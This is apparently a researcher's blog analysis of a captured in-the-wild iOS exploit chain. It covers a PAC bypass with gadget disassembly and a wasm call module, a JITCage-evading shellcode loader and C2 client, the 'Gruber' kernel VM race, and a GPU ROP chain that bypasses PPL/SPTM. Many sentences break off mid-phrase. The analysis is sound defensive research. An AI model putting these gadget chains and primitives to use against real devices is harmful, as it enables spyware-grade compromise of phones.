; CODE XREF: __HTTPConnectionFinalize+84↑j
LDR X8, [X19,#0x178] - _EdgeInfoCFArrayReleaseCallBack_paciza
LDR W0, [X19,#0x88] ; int
CBZ X8, loc_192E60B20
LDP X1, X2, [X19,#0x180] - early_malloc_buffer/x2
LDR X3, [X19,#0x190] - x3 (ib)
BLRAAZ X8
; CODE XREF: __HTTPConnectionFinalize+C4↓j
; __HTTPConnectionFinalize+D0↓j ...
MOV W8, #0xFFFFFFFF
STR W8, [X19,#0x88]
; CODE XREF: __HTTPConnectionFinalize:loc_192E60B20↓j
LDP X29, X30, [SP,#0x10+var_s0]
LDP X20, X19, [SP+0x10+var_10],#0x20
RETAB
_EdgeInfoCFArrayReleaseCallBack:
7f2303d5 pacibsp
f44fbea9 stp x20, x19, [sp, -0x20]!
fd7b01a9 stp x29, x30, [sp, 0x10]
fd430091 add x29, sp, 0x10
f30301aa mov x19, x1
f40300aa mov x20, x0
290440f9 ldr x9, [x1, 8] - buf4_80
280940f9 ldr x8, [x9, 0x10] - enet_allocate_packet_payload_default_paciza
880000b4 cbz x8, 0x30
200140f9 ldr x0, [x9] - buf3_80
610240f9 ldr x1, [x19] - sb
1f093fd6 blraaz x8
e00314aa mov x0, x20
e10313aa mov x1, x19
fd7b41a9 ldp x29, x30, [sp, 0x10]
f44fc2a8 ldp x20, x19, [sp], 0x20
ff2303d5 autibsp
d0071eca eor x16, x30, x30, lsl 1
5000f0b6 tbz x16, 0x3e, 0x50
208e38d4 brk 0xc471
08590514 b 0x156470
enet_allocate_packet_payload_default:
7f2303d5 pacibsp
f44fbea9 stp x20, x19, [sp, -0x20]!
fd7b01a9 stp x29, x30, [sp, 0x10]
fd430091 add x29, sp, 0x10
f30300aa mov x19, x0
48100fb0 adrp x8, 0x1e209000
086d41f9 ldr x8, [x8, 0x2d8] - dict.ab
e00301aa mov x0, x1
1f093fd6 blraaz x8
f40300aa mov x20, x0
800000b5 cbnz x0, 0x38
48100fb0 adrp x8, 0x1e209000
087541f9 ldr x8, [x8, 0x2e8]
1f093fd6 blraaz x8 - xmlSAX2GetPublicId_ref
740a00f9 str x20, [x19, 0x10] - stores to buf3_80 + 0x10
fd7b41a9 ldp x29, x30, [sp, 0x10]
f44fc2a8 ldp x20, x19, [sp], 0x20
ff0f5fd6 retab
xmlSAX2GetPublicId_ref:
mov x0, 0
ret
Oddly, this is needlessly complex; I don't see a reason why they couldn't have removed some of the gadgets. All of the PACIZA pointers come from regions in the dyld shared cache where they are stored signed and can simply be read out. Using more gadgets than necessary burns more of these pointers once the kit is caught, which is why I would've assumed there is a strong incentive to keep the number of gadgets low.
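Stripped of the gadget plumbing, the net effect of each derived primitive is small: set up the argument slots in the control structure, fire the PACIZA chain, then fetch x0 from the buffer the chain stores it to. A mock of that shape (mock primitives, my own names):

```javascript
// callRaw stands in for the PACIZA gadget chain; by construction the chain
// leaves the callee's x0 in a known slot, which read64 then fetches.
function makeCallWithRet(callRaw, read64, retSlot) {
  return (fnPtr, x0, x1, x2) => {
    callRaw(fnPtr, x0, x1, x2); // chain stores the call's result to retSlot
    return read64(retSlot);     // recover the return value
  };
}
```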
With these two primitives they are ready to perform the PAC bypass and have also gained the ability to call malloc (by using a PACIZA pointer to
For the PAC bypass they create an
This will land in
PACIBSP
STP X24, X23, [SP,#-0x10+var_30]!
STP X22, X21, [SP,#0x30+var_20]
STP X20, X19, [SP,#0x30+var_10]
STP X29, X30, [SP,#0x30+var_s0]
ADD X29, SP, #0x30
MOV X19, X3
MOV X20, X2
MOV X21, X0
MOV W23, #0x10
MOV W0, #0x10
MOV W1, #0x69EEEF37
BL _malloc_type_malloc_8
MOV X22, X0
MOV X0, X21
MOV X2, X22
BL _objc_msgSend$getUUIDBytes_
STR X23, [X20]
ADRP X16, #_free_ptr@PAGE
LDR X16, [X16,#_free_ptr@PAGEOFF]
PACIZA X16
STR X16, [X19]
MOV X0, X22
LDP X29, X30, [SP,#0x30+var_s0]
LDP X20, X19, [SP,#0x30+var_10]
LDP X22, X21, [SP,#0x30+var_20]
LDP X24, X23, [SP+0x30+var_30],#0x40
RETAB
As you can see, they malloc a 0x10-byte object, store the bytes of the UUID in it and then load the pointer to
The pattern can be reproduced with the following code:
typedef size_t (*fn_t)(const char *s);
fn_t f(void)
{
return strlen;
}
Which will generate the following assembly for
adrp x16, reloc.strlen
ldr x16, [x16]
paciza x16
mov x0, x16
ret
On its own this isn't a security bug because the pointer is inside the
I think the most pressing of them was Swift, which is also why I speculate that it took Apple until iOS 18 beta 1 to address this issue. Since then the linker will always protect
I assume that both
With this they can then sign
This signing functionality is then exported back to the main module.
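Putting the gadget's description together, the exported signer presumably boils down to: plant the raw pointer in the slot the gadget loads from, invoke it, and read the freshly signed pointer back out of the output slot. A mock of that flow (everything here is my guess at the shape, with mock primitives and my own names):

```javascript
// invokeGadget mocks the signing gadget: it "PACIZAs" whatever sits in
// freePtrSlot and stores the result to outSlot (x16/x19 in the listing).
function makeSigner(write64, read64, invokeGadget, freePtrSlot, outSlot) {
  return (rawPtr) => {
    const saved = read64(freePtrSlot);
    write64(freePtrSlot, rawPtr); // value the gadget will sign
    invokeGadget();               // adrp/ldr; paciza x16; str x16, [x19]
    write64(freePtrSlot, saved);  // restore the original pointer
    return read64(outSlot);       // signed pointer
  };
}
```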
Finally they have a class that supports calling with up to 8 arguments.
For this they use a wasm module that defines 3 functions. They take in 16 32-bit arguments in function
(module
(type (;0;) (func (param i64 i64 i64 i64 i64 i64 i64 i64) (result i64)))
(type (;1;) (func (param i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32) (result i64)))
(type (;2;) (func (param i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32)))
(func (;0;) (type 0) (param i64 i64 i64 i64 i64 i64 i64 i64) (result i64)
i64.const 0)
(func (;1;) (type 1) (param i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32) (result i64)
local.get 1
i64.extend_i32_u
i64.const 32
i64.shl
local.get 0
i64.extend_i32_u
i64.or
local.get 3
i64.extend_i32_u
i64.const 32
i64.shl
local.get 2
i64.extend_i32_u
i64.or
local.get 5
i64.extend_i32_u
i64.const 32
i64.shl
local.get 4
i64.extend_i32_u
i64.or
local.get 7
i64.extend_i32_u
i64.const 32
i64.shl
local.get 6
i64.extend_i32_u
i64.or
local.get 9
i64.extend_i32_u
i64.const 32
i64.shl
local.get 8
i64.extend_i32_u
i64.or
local.get 11
i64.extend_i32_u
i64.const 32
i64.shl
local.get 10
i64.extend_i32_u
i64.or
local.get 13
i64.extend_i32_u
i64.const 32
i64.shl
local.get 12
i64.extend_i32_u
i64.or
local.get 15
i64.extend_i32_u
i64.const 32
i64.shl
local.get 14
i64.extend_i32_u
i64.or
i32.const 0
call_indirect (type 0)
return)
(func (;2;) (type 1) (param i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32) (result i64)
local.get 0
local.get 1
local.get 2
local.get 3
local.get 4
local.get 5
local.get 6
local.get 7
local.get 8
local.get 9
local.get 10
local.get 11
local.get 12
local.get 13
local.get 14
local.get 15
call 1
return)
(func (;3;) (type 2) (param i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32 i32)
(local i64)
local.get 0
local.get 1
local.get 2
local.get 3
local.get 4
local.get 5
local.get 6
local.get 7
local.get 8
local.get 9
local.get 10
local.get 11
local.get 12
local.get 13
local.get 14
local.get 15
call 2
local.set 16
i32.const 0
local.get 16
i32.wrap_i64
i32.store
i32.const 4
local.get 16
i64.const 32
i64.shr_u
i32.wrap_i64
i32.store
return)
(table (;0;) 2 funcref)
(memory (;0;) 1 1)
(export "t" (table 0))
(export "m" (memory 0))
(export "o" (func 0))
(export "f" (func 3))
(elem (;0;) (i32.const 0) func 0))
The name of this class leaked in an error message (
After the signer and caller have been exported to the main module, they call a function to validate signing. This basically checks that signing a PAC-stripped wasm function pointer returns the same result as the original one.
Once the exploit has achieved a PAC signing and function calling primitive, the main module will load a MachO JIT loading module that is responsible for fetching the LPE stage. There are two different potential loaders, but for this capture
Similar to the seedbell generic helper module, this module features a class for the dyld shared cache and a MachO class, which the former uses to load all of the dylibs in the cache into it, as well as helper classes that are used for handling the MachO and its symbols.
Oddly, while it has similarities to the seedbell helper, it looks like a complete reimplementation (or rather, seedbell's helper is the reimplementation, since it shipped later): it uses its own number helper class and a standalone function to parse a MachO instead of embedding that logic in the MachO class. I really don't understand the design decision behind this, so I assume it happened because the codebase evolved until the PAC bypass eventually required a dyld shared cache parser of its own.
As the first step the orchestrator will call a function in this module that recreates the
Afterwards the orchestrator will create the JIT loader class. During construction this class will select a viable loading strategy based on the available code in JSC. It will check if:
If it doesn't find
Then the C2C JS client is created. They basically launch a new thread from inside the MachO later on and then return to JS code execution. This way they can maintain a communication channel to JS via a backend buffer, allowing them to do networking via JS (for example to fetch new payloads or send data back to the server). The C2C client has eight states:
The framework again validates that it isn't running on macOS, presumably because the LPE exploitation only supports iOS.
They then instantiate a new class that is responsible for loading the MachO stage. This will initially link the shellcode with default values and decompress a base64 encoded MachO. It will also write the resource url, a ChaCha20 key, the logging url (which is empty for this deployment) and the user agent into different buffers, so that the MachO can access them. Filling everything with default values allows them to do an accurate calculation of the size needed for the code cave. Based on the available methods the JIT loading module will either just create the cave via
struct config
{
uint64_t load_2_addr;
uint64_t macho_load_addr;
uint64_t is_zero;
uint64_t code_addr;
uint64_t macho_23_len;
uint64_t resource_url_addr;
uint64_t ChaCha20_key_addr;
uint64_t document_url_addr;
uint64_t data_to_load_addr;
uint64_t useragent_addr;
uint64_t logging_url_addr;
uint64_t signed_pacia1716_gadget;
uint64_t signed_pacib1716_gadget;
uint64_t signed_pacda_gadget;
uint64_t signed_pacdb_gadget;
uint64_t signed_braa_x10_gadget;
uint64_t mov_x2_x11_braa_x14_gadget_paciza;
uint64_t jit_op_mov_x13_4911_brab_x2_x13;
uint64_t braa_x14_pac_ctx;
uint64_t dlsym_addr;
uint64_t unk;
uint64_t in_private_browsing_mode;
uint64_t should_do_logging;
};
So with this the shellcode also has access to multiple signing and branch gadgets.
Finally, it uses the JIT loading module to load this code via a call to
The purpose of the shellcode is to load the MachO into memory and then optionally jump to it. It's quite large because it has to feature a full MachO parser & loader and code patterns to defeat the JITCage. This is also what I'll be mainly focusing on in this section, so if you aren't interested in JITCage bypasses you can skip to the next one.
Public documentation on the JITCage is limited; I was only able to find this presentation by Synacktiv and a talk by Luca on it. The JITCage was introduced as a hardware feature on A15. Generally, Apple's high-level idea seems to be that they want to control what an attacker can execute in JIT code. Regular JIT code doesn't need to perform any syscalls, for example, so they will fault on
To me it looks like the shellcode was compiled with a custom compiler to be compatible with running inside of this environment, while also staying compatible with running on older CPUs that don't support PAC and CPUs without the JITCage. In order to maintain compatibility with older CPUs the shellcode abuses the fact that the
MOV X30, #0xAAAAAAAAAAAAAAAA
XPACLRI
MOV X0, #0xAAAAAAAAAAAAAAAA
CMP X0, X30
CSET X0, NE
If the CPU supports PAC
MOV X10, X30
MOV X30, #0xAAAAAAAAAAAAAAAA
XPACLRI
MOV X11, #0xAAAAAAAAAAAAAAAA
CMP X11, X30
MOV X30, X10
B.NE +0x8
RET
MOV X10, X30
BLR X10
So on non-PAC devices the code will just execute a
MOV X11, X30
MOV X30, X10
XPACLRI
MOV X10, X30
MOV X30, X11
BR X10
Otherwise it has to go via an indirection. Remember that there is no way for an attacker to generate new JIT exit points because the keys to sign a valid function pointer have been locked away, so they need to use an existing one and get a call primitive from there. For this they use the JIT operation function
global _vmEntryHostFunction
_vmEntryHostFunction:
jmp a2, HostFunctionPtrTag
translating to the following asm:
_vmEntryHostFunction
MOV X13, #0x4911
BRAB X2, X13
So this is a function they can jump to from JIT code and by setting
From a high-level perspective, the shellcode will then execute the following:
The shellcode uses two interesting strategies to find the addresses of
The embedded MachO will now set up intercom functions for communication with the C2C JS client, implement functions for parsing the configuration files from the C2C server and acting upon them, detect CPU features and iOS version (this will also detect "unsafe" environments like Corellium), and detect a relaxed sandbox as well as code execution inside iTunes Store (instead of Safari). The main function will then do another environment check for Corellium, a valid CPU and
When the thread starts, it downloads a configuration file from the server. For this capture, that was
python3 parse_config.py ../processed_files/28_7a7d99099b035b2c6512b6ebeeea6df1ede70fbb_decompressed
elem: 0x70000 0x3 @ +0x18 (0x878)
0xf2300000 6c682a65deb7cf020dd640d130a2a73e9442ccddc441520c951620a4142605ad b'4800048658463f971e752ff93c1767e9ae7f3431.min.js'
0xf3300000 230ddaa380a7899e52be22cc926a4b7609303e14c3ed55d59049d3b20ee12974 b'b442ab113b829ff8c7bf34afa4d2d997889f308f.min.js'
0xf2400000 176f3b0d80c6c94f5bcc3e638185d1a4a057a859141b569f877468cc7bd7c149 b'5258f6e3eef3eda249179aa1122b50b03cbeea18.min.js'
0xf3400000 e6542d26109c5c3aa4f33c9ee07d69dc58ef66e81a7c20c2447cff7fe9f45a0c b'a78a94196b5d2c95865f6a8423a6b8eb86d07c6c.min.js'
0xf2700000 50a323f335f2bf4634b8f13526dc46f73d6ae15d4960d1f72e601aa4e733a7ec b'38af3c8ba461079a0edc83585023f76843066dcf.min.js'
0xf3700000 cab13d34917b6f5bdcfc69d7c668021b735a4d82b05b0918b9e228dc1860988e b'1334417664270db20af705f422878c53c8378203.min.js'
0xf2800000 6662406a17f3a38fdbbf9938d3c4c07b649ad22cf6d6f4c00bc9db96910b3817 b'226cbd845c5f470075505392be8693ec6d4f5ba3.min.js'
0xf3800000 fdd8b3940d2a06b0229d814e874095fd1fa87cb53db4699ba9dd8dd7370cf8cc b'ae7efd66ecde9e964cfe92f64e9b6461fce38f28.min.js'
0xf2900000 8360789e772f55126e9114dc7965d3162d6b7a781ddfa69be0971c66f04e6045 b'7a1cef00016b950be42f5288ead21fa6fccc3107.min.js'
0xf3900000 388976a2cdce966476ddc0f79249081ec182efc26808beb2e2e456f8c4809535 b'377bed7460f7538f96bbad7bdc2b8294bdc54599.min.js'
0xf3730000 3cb781d9c1ade5c3b54606839baa51f5c5751f73f0cd055fc101e41d467403d7 b'c8a14d79a27953242d60243ee2f505a85d9232cc.min.js'
0xf3830000 bdff99612a2aa99aef5cd7845d7f0b06a77c36d4f674fab7939799a39b8f78b1 b'1b2cbbde08f8b2330b7400abcb97c9573973e942.min.js'
0xf2750000 58199343c3811b01adda525bc08fcf135c6369fb3bdc3d52ca2374491e789f48 b'e9f898587620186e31119fbf32660f26c1e048e0.min.js'
0xf3750000 a6244c09c0588cf126ad727f75a647132543239c8b8fff5d362d56b616752327 b'f4120dc6717a489435d86943472c5a2444aac8e6.min.js'
0xa2050000 7da5f7d73e652aa782c89a883c27d0898affddf5d13b5914423a66a15ad3b319 b'f8a86cf368fdbbe294813926a2a229df041eb758.min.js'
0xa3050000 c02c657bb22d6cfc6aed70143f1fc8fbd44f33dbe6e12979d10c7891dcfc25c7 b'72a5ac816709f9c331f2b3afb76cd3d96517ea14.min.js'
0xa3060000 338bf220589af21d44e4dda167fab47c99040da951c40406ff99b5c4cc48735e b'980c77f1747afa9ac1fa5f8fbfb9e6663e9f82bb.min.js'
0xa3030000 be7efb67c5b39656f00f03b5a06593bf41bd760e5280a887f0a701226f39c3c8 b'5e89f83ec50c6223d664d3f3260ef874a3d6d796.min.js'
0xa3040000 a19b901b47f9dd7b86ca75fa1d25bd4404e9cdd2e2bf56722149fc213434f00e b'2a1d692b7b5ba793527b2c14b48db21a3e5d2c5f.min.js'
Basically this configuration file contains one element of type
elem: 0x80000 0x3 @ +0x78 (0x37e40)
elem: 0x90000 0x3 @ +0x37eb8 (0x516d0)
elem: 0xf0000 0x3 @ +0x89588 (0x2eb40)
elem: 0x70005 0x3 @ +0xb80c8 (0x2c)
elem: 0x50000 0x3 @ +0xb80f4 (0x610c)
elem: 0x90001 0x3 @ +0xbe200 (0x50a40)
elem: 0x70000 0x3 @ +0x10ec40 (0x1d4)
0x2900000 85ab5908ceb1981df3449b52155a5026561c51d6f9f599acc99c5203b14733eb b'4612aa650e60e2974a9ec37bbf922c79635b493a.min.js'
0xe2900000 b252669de4b4adc34114fdf10d75f66b3efad6280f4fcd19603f6fac5873ede2 b'4817ea8063eb4480e915f1a4479c62ec774f52ce.min.js'
The new config (0x70000) contains entries for the PE, one of which (0xe2900000) the kit will later download. 0x70005 is the process name the PE should get injected into (
The code will then update the configuration with the following ids:
Afterwards the new config (0x70000) is returned. If
Due to time constraints, I also only had a high-level look at this MachO. It seems to be the PE orchestrator, loading the main PE MachO (0x90000), calling
The 0x90000 MachO is the main PE stage. In it are both
Gruber is a race condition between a
Because this was super hard to figure out, I think it's easiest to take you along for the ride instead of just describing the bug right away. I'll skip over a lot of setup to keep this part a bit shorter; we will talk about it more in depth in the exploitation section.
Initially the exploit will find a submap (vm
vm_address_t addr = 0;
// ...
ret = vm_map(mach_task_self(),
&addr,               /* in/out: address of the new mapping */
size,
0,                   /* alignment mask */
VM_FLAGS_FIXED,
memory_entry_port,   /* the memory entry to map */
0x0,                 /* offset into the entry */
true,                /* copy */
VM_PROT_READ,        /* cur_protection */
VM_PROT_READ,        /* max_protection */
VM_INHERIT_DEFAULT);
As you can see, because
mach_make_memory_entry_64(mach_task_self(),
&size,               /* in/out: size of the entry */
0x0,                 /* offset */
VM_PROT_READ,        /* permission */
&new_port,           /* out: the new memory entry port */
memory_entry_port);  /* parent entry */
Then the ref count of the
The only other piece of good information that is easily obtainable is that when the bug was patched in 17.3, Apple started taking a lock on the parent entry in
The main issue that remains is that the
In the past I've used Corellium's HyperTrace feature to get kernel execution traces. "Luckily" the feature was broken on my Corellium/model/version combination, which led me to try out CoreXight instead. This is an even lower-level feature based on CoreSight, which allows tracing the full VM, including usermode. That proved very useful here, because it allowed me to align the two traces on the
To initiate a trace you need to connect to the Charm console and issue a
$ rlwrap socat - /run/charmd
armtrace name:<vm name> stream:/tmp/capture.bin filter:"clear: name:<process name>" el1:1
This will then trace the vm
The trace is saved in a custom format, but Corellium provides a tool (
corexight /tmp/capture.bin -strace /usr/share/corellium/strace/ios-arm64.csmf -global macho:/tmp/kc@0xfffffff029d04000
The first argument is the trace file, followed by the syscall definitions (to allow resolving those) and the kernel MachO. Using
A trace then looks like this:
5 1430 gruber 51072 > 0x00000001df14c1d4 mach_msg2 ( msg: 0x16d60ae38 -> { msgh_bits: 0x80001513, msgh_size: 100, msgh_remote_port: 515, msgh_local_port: 0x117b7, msgh_voucher_port: 0, msgh_id: 4811, msg: [ 0x01 0x00 0x00 0x00 0x6b 0x38 0x01 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x13 0x00 0x00 0x00 0x00 0x00 0x01 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x80 0x04 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x01 0x00 0x00 0x00 0x01 0x00 0x00 0x00 0x01 0x00 0x00 0x00 0x01 0x00 0x00 0x00 ... ] }, option: 0x200000003 (MACH_RCV_MSG|MACH_SEND_MSG|0x200000000), msgh_bits: 0x80001513, send_size: 100, msgh_remote_port: 515, msgh_local_port: 0x117b7, msgh_voucher_port: 0, msgh_id: 4811, rcv_msgh_bits: 1, rcv_name: 0x117b7, rcv_size: 52, notify: 0, timeout: 0 ) ... @[ 00000001df14bf70 00000001df154bd4 00000001df154ac0 0000000102ab0c40 000000020175b4d4 000000020175aa10 ]
5 1430 gruber 51072 0xfffffff02aacb474-0xfffffff02aacb477
5 1430 gruber 51072 0xfffffff02aacb478-0xfffffff02aacb4bb
5 1430 gruber 51072 0xfffffff02aacc560-0xfffffff02aacc563
I already prefiltered the trace using this grep chain
My final traces had one small difference at the beginning (likely something during syscall entry), but then they heavily diverged later on, and seeking to the address right before the divergence brought me straight to the root cause. Thirty minutes of dynamic analysis beat 50+ hours of static analysis, so I can only recommend this approach if you have the means to do it.
So thanks to dynamic analysis with the traces, we know that the flow diverges in a function called
The high-level preparation steps are: preparing the physical-page free pool for the pUAF, and setting up the mappings and mach ports needed to be able to spray
In order to guarantee correctly triggering the bug, they initially create enough memory entry ports (equal to the racer thread count) to reference the
Their next step is to reallocate the pUAF'd memory with kernel objects. For this they want a clean physical-page free list, or rather, to know when the kernel will start consuming their pages. So they allocate memory and place a marker on it, then observe the pUAF mapping to see if the marker appears, repeating in a loop until it does.
They trigger the bug twice: once using
They only reject on the first condition, because they can't guarantee that their
For
For the early read they will receive the mach messages that hold the OOL descriptors until they observe the address inside of the observed
In addition, they remove the entry from the red-black tree by setting
Then they call
if (!vm_map_lookup_entry(map, start, &tmp_entry)) {
if ((entry = tmp_entry->vme_next) == vm_map_to_entry(map)) {
vm_map_unlock_read(map);
return KERN_INVALID_ADDRESS;
}
} else {
entry = tmp_entry;
}
So if the lookup fails (and thereby returns the last entry it saw) it will take
start = entry->vme_start;
basic->offset = VME_OFFSET(entry);
basic->protection = entry->protection;
basic->inheritance = entry->inheritance;
basic->max_protection = entry->max_protection;
basic->behavior = entry->behavior;
basic->user_wired_count = entry->user_wired_count;
basic->reserved = entry->is_sub_map;
*address_u = vm_sanitize_wrap_addr(start);
*size_u = vm_sanitize_wrap_size(entry->vme_end - start);
After the read they restore the original values.
For the physical mapping primitive they will use the first
They can read
They implement 5 different write strategies:
Instead of using the mapping primitive they initially set up with the offset, for this one they have to modify kernel structures (again, I really don't understand why they duplicate primitives here). This requires a 64-bit kernel write: they first steal the IOGPU port from SpringBoard during setup and then use it to create an IOGPU object. Then they use their original mapping primitive to map this object and use
For the kernel read they have several strategies:
Initially, I didn't understand why they even need these read functions when they could instead use the mapping primitive to map the data into usermode and read it from there, but Alfie correctly pointed out that PPL/SPTM-protected mappings can't be mapped that way (doing so would lead to a kernel panic), so it makes sense that they have to provide these primitives here.
Depending on version (and I assume sandbox) a working primitive is selected.
As the final step before they can load their implant, they need to bypass PPL (on modern phones, SPTM). For this, they gain GFX (GPU) code execution, defeat that coprocessor's μPPL implementation, and then use full GFX physical memory access to create a self-referencing page table entry (PTE) on the AP, which they can use to bypass PPL/SPTM when writing to protected memory.
The GFX is the GPU coprocessor on Apple Silicon. It runs its own firmware (a variant of RTKit) and communication from the AP is done via two kernel drivers:
In iOS 17.4, there is one change I associate with a patch for Rocket: GFX's
The function that sets up the self-referencing PTE will initially do a lot of offset finding on
For this they use yet another primitive: the ability to kalloc memory that they don't own, but that is owned by the kernel. Depending on the XNU version they will either grow the
With the mappings prepared, they then set up a ROP chain that is meant to be executed on the GFX. Depending on the SoC, they execute one of three ROP chains. From a high-level PoV, all of them revolve around entering hibernation with a controlled hibernation state, so that on wake-up, thanks to that state control, they regain code execution and also run with fully controlled page tables. Generally speaking, the ROP chain will: restore the entry point (to avoid executing the ROP chain again), set up the hibernation data structures so that they regain code execution with controlled page tables, return to regular execution, and wait for hibernation or trigger it themselves. Then, once they wake up from hibernation and have regained code execution with the fake page tables, they set up the self-referencing PTE on the AP and gracefully exit the ROP to continue regular execution.
To kick off the chain, they insert a job into the GFX job list which contains only a single GPU fence/stamp operation. This gives them a 32-bit write primitive on the GFX. With this 32-bit write they overwrite the thread state pointer of the power thread to point to their own (they overwrite bytes 1-4, which gives them full control of the pointer with 32 bits except for the bottom byte, and then align their fake object to the same bottom byte as the original pointer). This lets them gain code execution in the context of the power thread once it gets scheduled again. When they have a stolen port, they can easily submit a job to the GFX using an external method (plus some patching of data structures to insert that malformed fence operation), whereas without it they use the physical mapping primitive to map the job list and insert the job into it directly.
The GFX ROP chains are based on this gadget:
ADD X1, X1, #0x210
STP X4, X5, [X1]
STR W6, [X1,#0x10]
BL __rtk_arch_fast_interrupt
ADD X1, SP, #0x350+var_240
LDP X2, X3, [X1,#-0x10]
LDR X4, [X1],#8
MSR CPACR_EL1, X4
LDP X5, X6, [X1]
MSR FPSR, X5
MSR FPCR, X6
LDP Q0, Q1, [X1,#0x10]
// [...] loading Q2-Q29
LDP Q30, Q31, [X1,#0x1F0]
ADD X1, X1, #0x210
LDP X5, X6, [X1]
LDR W7, [X1,#0x10]
MSR ELR_EL1, X2
MSR SPSR_EL1, X3
MSR FAR_EL1, X5
MSR PAR_EL1, X6
MSR ESR_EL1, X7
LDP X6, X7, [SP,#0x350+var_320]
LDP X8, X9, [SP,#0x350+var_310]
LDP X10, X11, [SP,#0x350+var_300]
LDP X12, X13, [SP,#0x350+var_2F0]
LDP X14, X15, [SP,#0x350+var_2E0]
LDP X16, X17, [SP,#0x350+var_2D0]
LDR X18, [SP,#0x350+var_2C0]
LDP X29, X30, [SP,#0x350+var_268]
LDP X0, X1, [SP,#0x350+var_350]
LDP X2, X3, [SP,#0x350+var_340]
LDP X4, X5, [SP,#0x350+var_330]
ADD SP, SP, #0x350
ERET
It allows them to load all registers and perform a double jump by setting
For modifying memory they use a
There are three different versions of the ROP chain.
For A13, prior to execution they will modify (using AP physical R/W)
On A14-A17 they will:
Thanks to a tweet from Plx we now know that
Additionally, on A14 they perform a second PTE store before restoring state to unmap the second GFX MMIO region (0xfffffc1100170000) by replacing it with a regular mapping. I don't fully know why they need to do this on A14 only, but I suspect they want the AP to not read certain values from that region and then potentially panic.
I suspect that the reason they can't do the A13 attack on A14+ is that stronger CTRR no longer allows them to modify
With this they now have full physical R/W and can load the implant. I assume this is done inside the
This section contains all the open questions I have after my analysis so far. I will likely come back to answer them in a while and then update this post.
Pointer Authentication Codes (PAC) is a security feature introduced with ARMv8.3 that provides Control-Flow Integrity (CFI) on both the forward edge (preventing JOP) and the backward edge (preventing ROP). PAC works by adding a cryptographic signature to pointers, which can be verified before a pointer is used. This helps prevent attackers from manipulating pointers to execute arbitrary code or access unauthorized memory. Apple shipped PAC on A12 and later devices, so on these devices attackers need a PAC bypass before they can achieve code execution. There is a blog post by Brandon Azad, who analysed the initial implementation, and many more talks about bypasses on the web.
The JITBox/JITCage is a security feature inside of WebContent that tries to prevent attackers from using the JIT region as a way to defeat CFI. There is very little public documentation on it, but I've found this presentation by Synacktiv and a talk by Luca. Apple basically limits which assembly instructions can execute inside the JIT region and where the code can jump (by disallowing unauthenticated jumps and jumps outside of the region, and by restricting access to the signing keys for authenticated jumps).
The Page Protection Layer (PPL) on older and Secure Page Table Monitor (SPTM) on newer devices is responsible for protecting the system against an attacker who already has kernel R/W. It does so by obtaining control over the page tables as well as other important data structures and keeping them read-only from the kernel so that they can't be modified without getting a write primitive inside of the PPL/SPTM context first. Good blog posts about them can be found here, here and here.
The term pUAF was first coined by felix-pb in his kfd writeup. Contrary to a regular UAF, where the virtual address gets reused, a physical UAF (pUAF) describes a scenario where, due to a bug inside the vm subsystem, the physical pages backing a mapping get freed while the (virtual) mapping still exists. This means that the virtual address of the mapping can still be used to access the memory, but it will now point to whatever new data got allocated on those physical pages. This is a very powerful primitive as it allows an attacker to then simply spray kernel structures they wish to modify, detect them appearing on their pUAF'd mapping and then modify them straight from usermode.
I hope you've enjoyed the read. Thanks to everyone who helped me with this, in capture, analysis, understanding and proof reading!
If you have any questions or suggestions for improvement you can reach out to me on Twitter or via E-Mail.
Till next time ~lailo